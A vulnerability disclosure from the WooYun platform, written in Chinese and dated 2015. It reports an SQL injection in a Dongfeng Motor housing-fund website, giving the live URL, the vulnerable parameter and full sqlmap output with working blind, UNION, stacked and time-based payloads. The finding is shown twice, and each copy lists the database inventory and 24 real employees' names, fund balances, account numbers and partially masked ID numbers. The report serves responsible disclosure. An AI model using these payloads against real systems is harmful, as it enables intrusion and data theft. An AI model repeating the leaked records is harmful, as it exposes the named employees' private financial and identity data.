当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124628

漏洞标题:东风汽车公司某子站SQL注射(泄露6W多员工姓名、身份证号、公积金账号、公积金余额等)

相关厂商:东风汽车公司

漏洞作者: Ysql404

提交时间:2015-07-05 11:31

修复时间:2015-08-23 16:16

公开时间:2015-08-23 16:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-05: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

东风汽车公司始建于1969年,是中国汽车行业的骨干企业。经过三十多年的建设,已陆续建成了十堰(主要以中、重型商用车、零部件、汽车装备事业为主)、襄樊(以轻型商用车、乘用车为主)、武汉(以乘用车为主)、广州(以乘用车为主)等主要生产基地,公司运营中心于2003年9月28日由十堰迁至武汉。主营业务包括全系列商用车、乘用车、汽车零部件和汽车装备。目前,整车业务产品结构基本形成商用车、乘用车各占一半的格局。截至2004年底,公司总资产768.9亿元(RMB),净资产339亿元(RMB),在册员工10.6万人。

详细说明:

东风汽车公司某子站SQL注射(泄露6W多员工姓名、身份证号、公积金余额等)、后台管理员密码密码明文存储;
注入地址: http://www.dfgjj.dfmc.com.cn/ShowNews.aspx?Id=2345 参数:Id

GET parameter 'Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: Id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=2345 AND 8776=8776
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: Id=2345 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(104)+CHAR(113)+CHAR(103)+CHAR(113)+CHAR(100)+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(71)+CHAR(104)+CHAR(67)+CHAR(68)+CHAR(83)+CHAR(79)+CHAR(113)+CHAR(99)+CHAR(118)+CHAR(112)+CHAR(113),NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Id=2345; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Id=2345 WAITFOR DELAY '0:0:5'--
---
[10:12:49] [INFO] testing Microsoft SQL Server
[10:12:49] [INFO] confirming Microsoft SQL Server
[10:12:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[10:12:50] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.dfgjj.dfmc.com.cn'


available databases [12]:                                                      
[*] BANKDB
[*] CenterNew
[*] CenterXF
[*] distribution
[*] DKDBSY
[*] DKDBXY
[*] GJJWEB
[*] master
[*] model
[*] msdb
[*] sybx
[*] tempdb


GJJCX 公积金查询表中数据有6万多条

Database: GJJWEB
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.GJJCX   | 60799   |
| dbo.article | 152     |
| dbo.address | 56      |
| dbo.gjjuser | 2       |
| dbo.dkll    | 1       |
+-------------+---------+


YE:余额 ZH:账号 SFZ:身份证

Database: GJJWEB
Table: GJJCX
+-----------+--------+---------+-----------+-----------+--------------------+
| XH        | RQ     | XM      | YE        | ZH        | SFZ                |
+-----------+--------+---------+-----------+-----------+--------------------+
| 154832076 | 201504 | 孙斌      | 75287.32  | 020100132 | 42030019570825**** |
| 154832077 | 201504 | 吴爱华     | 65713.77  | 020100135 | 42030019671106**** |
| 154832078 | 201504 | 程圣炎     | 6168.21   | 020100138 | 42030019650910**** |
| 154832079 | 201504 | 张利红     | 50966.85  | 020100145 | 42030019760707**** |
| 154832080 | 201504 | 黄静      | 63911.33  | 020100150 | 42030019681107****|
| 154832081 | 201504 | 刘之顺     | 139101.51 | 020100157 | 42030019630916**** |
| 154832082 | 201504 | 刘远泽     | 46135.70  | 020100162 | 42030019620203**** |
| 154832083 | 201504 | 余咏梅     | 22998.69  | 020100165 | 42030319720420**** |
| 154832084 | 201504 | 张红英     | 126249.82 | 020100168 | 42030019670515**** |
| 154832085 | 201504 | 马朝阳     | 147861.24 | 020100177 | 42030019630504**** |
| 154832086 | 201504 | 王春萍     | 62105.92  | 020100182 | 42030019680322**** |
| 154832087 | 201504 | 王韬      | 58395.98  | 020100186 | 42010619671013**** |
| 154832088 | 201504 | 杨小莉     | 72198.16  | 020100187 | 42030019650416**** |
| 154832089 | 201504 | 任桂梅     | 62851.21  | 020100188 | 42030019690510**** |
| 154832090 | 201504 | 程勇      | 16843.02  | 020100191 | 42030019710806**** |
| 154832091 | 201504 | 陈立      | 3208.12   | 020100192 | 42030067091****   |
| 154832092 | 201504 | 于凯      | 14159.32  | 020100197 | 42030019700405**** |
| 154832093 | 201504 | 胥刘继     | 115226.03 | 020100198 | 42030019620802**** |
| 154832094 | 201504 | 王浩      | 69741.11  | 020100201 | 42030019750820**** |
| 154832095 | 201504 | 曾守辉     | 49091.67  | 020100202 | 42030019720827**** |
| 154832096 | 201504 | 杨杰伟     | 16172.10  | 020100210 | 42030019730105**** |
| 154832097 | 201504 | 李斌      | 65742.55  | 020100211 | 420300196703122*** |
| 154832098 | 201504 | 周启霞     | 49977.52  | 020100212 | 42030019751211**** |
| 154832099 | 201504 | 雷涛      | 50668.03  | 020100214 | 420300196602262**** |


网站可查询:

QQ图片20150705105623.png


后台管理员密码明文存储

QQ图片20150705110002.png


漏洞证明:

GET parameter 'Id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection points with a total of 42 HTTP(s) requests:
---
Place: GET
Parameter: Id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Id=2345 AND 8776=8776
    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: Id=2345 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(104)+CHAR(113)+CHAR(103)+CHAR(113)+CHAR(100)+CHAR(71)+CHAR(109)+CHAR(65)+CHAR(71)+CHAR(104)+CHAR(67)+CHAR(68)+CHAR(83)+CHAR(79)+CHAR(113)+CHAR(99)+CHAR(118)+CHAR(112)+CHAR(113),NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Id=2345; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Id=2345 WAITFOR DELAY '0:0:5'--
---
[10:12:49] [INFO] testing Microsoft SQL Server
[10:12:49] [INFO] confirming Microsoft SQL Server
[10:12:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2012
[10:12:50] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.dfgjj.dfmc.com.cn'


available databases [12]:                                                      
[*] BANKDB
[*] CenterNew
[*] CenterXF
[*] distribution
[*] DKDBSY
[*] DKDBXY
[*] GJJWEB
[*] master
[*] model
[*] msdb
[*] sybx
[*] tempdb


GJJCX 公积金查询表中数据有6万多条

Database: GJJWEB
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.GJJCX   | 60799   |
| dbo.article | 152     |
| dbo.address | 56      |
| dbo.gjjuser | 2       |
| dbo.dkll    | 1       |
+-------------+---------+


YE:余额 ZH:账号 SFZ:身份证

Database: GJJWEB
Table: GJJCX
+-----------+--------+---------+-----------+-----------+--------------------+
| XH        | RQ     | XM      | YE        | ZH        | SFZ                |
+-----------+--------+---------+-----------+-----------+--------------------+
| 154832076 | 201504 | 孙斌      | 75287.32  | 020100132 | 42030019570825**** |
| 154832077 | 201504 | 吴爱华     | 65713.77  | 020100135 | 42030019671106**** |
| 154832078 | 201504 | 程圣炎     | 6168.21   | 020100138 | 42030019650910**** |
| 154832079 | 201504 | 张利红     | 50966.85  | 020100145 | 42030019760707**** |
| 154832080 | 201504 | 黄静      | 63911.33  | 020100150 | 42030019681107****|
| 154832081 | 201504 | 刘之顺     | 139101.51 | 020100157 | 42030019630916**** |
| 154832082 | 201504 | 刘远泽     | 46135.70  | 020100162 | 42030019620203**** |
| 154832083 | 201504 | 余咏梅     | 22998.69  | 020100165 | 42030319720420**** |
| 154832084 | 201504 | 张红英     | 126249.82 | 020100168 | 42030019670515**** |
| 154832085 | 201504 | 马朝阳     | 147861.24 | 020100177 | 42030019630504**** |
| 154832086 | 201504 | 王春萍     | 62105.92  | 020100182 | 42030019680322**** |
| 154832087 | 201504 | 王韬      | 58395.98  | 020100186 | 42010619671013**** |
| 154832088 | 201504 | 杨小莉     | 72198.16  | 020100187 | 42030019650416**** |
| 154832089 | 201504 | 任桂梅     | 62851.21  | 020100188 | 42030019690510**** |
| 154832090 | 201504 | 程勇      | 16843.02  | 020100191 | 42030019710806**** |
| 154832091 | 201504 | 陈立      | 3208.12   | 020100192 | 42030067091****   |
| 154832092 | 201504 | 于凯      | 14159.32  | 020100197 | 42030019700405**** |
| 154832093 | 201504 | 胥刘继     | 115226.03 | 020100198 | 42030019620802**** |
| 154832094 | 201504 | 王浩      | 69741.11  | 020100201 | 42030019750820**** |
| 154832095 | 201504 | 曾守辉     | 49091.67  | 020100202 | 42030019720827**** |
| 154832096 | 201504 | 杨杰伟     | 16172.10  | 020100210 | 42030019730105**** |
| 154832097 | 201504 | 李斌      | 65742.55  | 020100211 | 420300196703122*** |
| 154832098 | 201504 | 周启霞     | 49977.52  | 020100212 | 42030019751211**** |
| 154832099 | 201504 | 雷涛      | 50668.03  | 020100214 | 420300196602262**** |


网站可查询:

QQ图片20150705105623.png


后台管理员密码明文存储

QQ图片20150705110002.png


修复方案:

测试过程中跑的数据已删除,未脱库!

版权声明:转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-07-09 16:15

厂商回复:

CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无